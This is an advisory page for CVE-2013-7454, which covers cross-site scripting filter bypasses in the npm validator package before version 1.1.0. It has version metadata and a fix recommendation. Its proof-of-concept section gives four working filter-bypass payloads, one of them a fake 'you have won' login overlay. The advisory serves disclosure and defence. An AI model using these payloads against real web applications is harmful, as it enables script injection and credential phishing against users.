Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXE0cXEtZm03cS1jd3A1

Multiple XSS Filter Bypasses in validator

Versions of validator prior to 1.1.0 are affected by several cross-site scripting vulnerabilities due to bypasses discovered in the blacklist-based filter.

Proof of Concept

Various inputs that could bypass the filter were discovered:

Improper parsing of nested tags:

<s <onmouseover="alert(1)"> <;s onmouseover="alert(1)">This is a test</s>

Incomplete filtering of javascript: URIs:

<a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a>

UI Redressing:

<div style="z-index: 9999999; background-color: green; width: 100%; height: 100%">
<h1>You have won</h1>Please click the link and enter your login details:
<a href="http://example.com/">http://good.com</a>
</div>

Bypass via Nested Forbidden Strings:

<scrRedirecRedirect 302t 302ipt type="text/javascript">prompt(1);</scrRedirecRedirect 302t 302ipt>

Additional bypasses were discovered by Krzysztof Kotowicz in 2012 when auditing CodeIgniter's XSS filtering function, which this code was based off of.

Recommendation

If you are a developer currently using the xss filter function from the validator package, you should consider replacing it with the escape filter function from the same package. This function replaces all instances of angle brackets (<, >), ampersands, and quotation marks, so no HTML tags will be processed.

Permalink: https://github.com/advisories/GHSA-q4qq-fm7q-cwp5
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXE0cXEtZm03cS1jd3A1
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: over 6 years ago
Updated: over 1 year ago


CVSS Score: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Identifiers: GHSA-q4qq-fm7q-cwp5, CVE-2013-7454
References: Blast Radius: 34.7

Affected Packages

npm:validator
Dependent packages: 5,570
Dependent repositories: 493,728
Downloads: 47,911,273 last month
Affected Version Ranges: < 1.1.0
Fixed in: 1.1.0
All affected versions: 0.1.0, 0.1.1, 0.1.2, 0.1.3, 0.1.4, 0.1.5, 0.1.6, 0.1.7, 0.1.8, 0.1.9, 0.2.0, 0.2.1, 0.2.2, 0.2.3, 0.2.4, 0.2.5, 0.2.6, 0.2.7, 0.2.8, 0.2.9, 0.3.0, 0.3.1, 0.3.2, 0.3.4, 0.3.5, 0.3.6, 0.3.7, 0.3.8, 0.3.9, 0.4.0, 0.4.1, 0.4.2, 0.4.3, 0.4.4, 0.4.5, 0.4.6, 0.4.7, 0.4.8, 0.4.9, 0.4.10, 0.4.11, 0.4.12, 0.4.13, 0.4.15, 0.4.16, 0.4.17, 0.4.18, 0.4.19, 0.4.20, 0.4.21, 0.4.22, 0.4.23, 0.4.24, 0.4.25, 0.4.27, 0.4.28, 0.5.0, 1.0.0
All unaffected versions: 1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.2.0, 1.2.1, 1.2.2, 1.3.0, 1.4.0, 1.5.0, 1.5.1, 2.0.0, 2.1.0, 3.0.0, 3.1.0, 3.2.0, 3.2.1, 3.3.0, 3.4.0, 3.5.0, 3.5.1, 3.6.0, 3.7.0, 3.8.0, 3.9.0, 3.10.0, 3.11.0, 3.11.1, 3.11.2, 3.12.0, 3.13.0, 3.14.0, 3.14.1, 3.15.0, 3.16.0, 3.16.1, 3.17.0, 3.17.1, 3.17.2, 3.18.0, 3.18.1, 3.19.0, 3.19.1, 3.20.0, 3.21.0, 3.22.0, 3.22.1, 3.22.2, 3.23.0, 3.24.0, 3.25.0, 3.26.0, 3.27.0, 3.28.0, 3.29.0, 3.30.0, 3.32.0, 3.33.0, 3.34.0, 3.35.0, 3.36.0, 3.37.0, 3.38.0, 3.39.0, 3.40.0, 3.40.1, 3.41.0, 3.41.1, 3.41.2, 3.41.3, 3.42.0, 3.43.0, 4.0.0, 4.0.1, 4.0.2, 4.0.3, 4.0.4, 4.0.5, 4.0.6, 4.1.0, 4.2.0, 4.2.1, 4.3.0, 4.4.0, 4.5.0, 4.5.1, 4.5.2, 4.6.0, 4.6.1, 4.7.0, 4.7.1, 4.8.0, 4.9.0, 5.0.0, 5.1.0, 5.2.0, 5.3.0, 5.4.0, 5.5.0, 5.6.0, 5.7.0, 6.0.0, 6.1.0, 6.2.0, 6.2.1, 6.3.0, 7.0.0, 7.1.0, 7.2.0, 8.0.0, 8.1.0, 8.2.0, 9.0.0, 9.1.0, 9.1.1, 9.1.2, 9.2.0, 9.3.0, 9.4.0, 9.4.1, 10.0.0, 10.1.0, 10.2.0, 10.3.0, 10.4.0, 10.5.0, 10.6.0, 10.7.0, 10.7.1, 10.8.0, 10.9.0, 10.10.0, 10.11.0, 11.0.0, 11.1.0, 12.0.0, 12.1.0, 12.2.0, 13.0.0, 13.1.0, 13.1.1, 13.1.17, 13.5.0, 13.5.1, 13.5.2, 13.6.0, 13.7.0, 13.9.0, 13.11.0